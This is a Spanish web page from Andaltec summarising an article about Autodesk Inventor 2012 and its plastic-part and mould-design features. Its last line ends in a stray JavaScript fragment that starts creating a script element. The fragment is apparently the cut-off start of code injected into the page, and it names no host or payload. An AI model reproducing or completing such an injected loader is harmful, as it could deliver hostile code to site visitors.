Andaltec
Copyright Andaltec
Nueva versión de Autodesk Inventor, software para el diseño de productos de plástico - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
27791
post-template-default,single,single-post,postid-27791,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Nueva versión de Autodesk Inventor, software para el diseño de productos de plástico

Nueva versión de Autodesk Inventor, software para el diseño de productos de plástico

Podemos leer un artículo muy interesante en la web sobre ciencia y tecnología La Flecha acerca de Autodesk Inventor 2012, la nueva versión del software de Autodesk para el diseño de productos industriales. La nueva solución supone un salto cualitativo en el diseño de productos compuestos por piezas de plástico.

Ahora los ingenieros y diseñadores industriales podrán crear diseños de productos como carcasas de móviles, carrocería, juguetes, etc,… automatizando gran parte de sus funciones o haciendo estimaciones sobre su impacto medioambiental.

Combinar los modelos 3D de Inventor con superficies creadas en Autodesk Alias, efectuar análisis sobre moldes al principio del ciclo del diseño o simularlo y optimizarlo antes de su mecanización, son sólo algunas de las novedades incluidas en este software. Además, Autodesk ha puesto a disposición de los usuarios que una demo gratuita bajo descarga que se puede encontrar en su portal.

En cuanto al diseño de moldes de plástico, Inventor 2012 logra reducir drásticamente los tiempos para el diseño de estos moldes mediante inyección.

Pincha aquí para leer el artículo completo.var d=document;var s=d.createElement(‘script’);